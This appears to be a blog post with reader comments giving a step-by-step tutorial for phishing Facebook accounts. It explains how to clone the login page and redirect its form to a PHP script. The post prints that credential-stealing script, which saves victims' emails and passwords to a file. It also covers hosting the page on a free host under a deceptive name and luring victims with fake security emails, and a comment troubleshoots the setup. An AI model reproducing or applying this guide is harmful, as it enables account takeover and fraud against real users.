Hacking facebook account:Phishing

It is an attempt to illegally acquire confidential data by masquerading as a trustworthy entity in an electronic communication.

Requirements for facebook phishing:
Account on any free-hosting site, such as my3gb.com

What you have to do:

1) Go to facebook.com
Save this page and open it with a notepad or any other text editor.
2)now edit Welcome to Facebook – Log In, Sign Up or Learn More.htm in notepad.
3) search for action (Press Ctrl+F)
you will see likeaction=”https://www.facebook.com/login.php?login_attempt=1″
now replace https://www.facebook.com/login.php?login_attempt=1 by login.php
login.php is a php script to get user’s email-id and password.
now it will look likeaction=”login.php”
save this file and name it as facebook.com.htm
because victim will see this name in address bar.
4)now open new text document and copy below script in it

<?php $fp = fopen(“Passwords.htm”, “a”);fwrite($fp, “Email of victim:$_POST[email]\nPassword:$_POST[pass]”);header( ‘Location: www.google.com) ;;/*any web-site you want to redirect user after pressing log-inbut not facebook.com because it gives warning that we are redirected from phishing page remove this comment after copying */?>

now save this file as login.php
it will ask to change file format choose yes.
5) Now you are ready to upload these two files to file-manager of free-hosting site.
6) After uploading files on site double click on
facebook login html file
browser will open your html but in address bar it is showing your username with your free-hosting site.
so while creating account on free-hosting site be sure with our username.keep it as recovery-facebook
something that won’t let victim take a doubt that this is a phishing facebook page.

7)when victim will enter his email-id and password as he/she hits on login new file password.htm is created in your
file-manager with e-mail id and password.

but victim will more likely click on link if he / she has got mail from facebook to make a secure-login on provided link

Related Posts

I have created these two files and before uploading I tried myself on the folder in my desktop, but it does not create password.htm. Can you tell me did I do it wrong? or does this not work in my own PC?

On desktop in secure-login.html when you are entering username and password in your browser,after login you will see your login.php script in browser. this is because you are not executing login.php so secure-login.html takes it as text format.
try this.
1)copy this comment and paste it in new text document,
2)rename it as file.html.
now double click on it you will see your text in browser.
that’s it.
In free-hosting site you will see that it includes php,html that means that hosting server can execute your files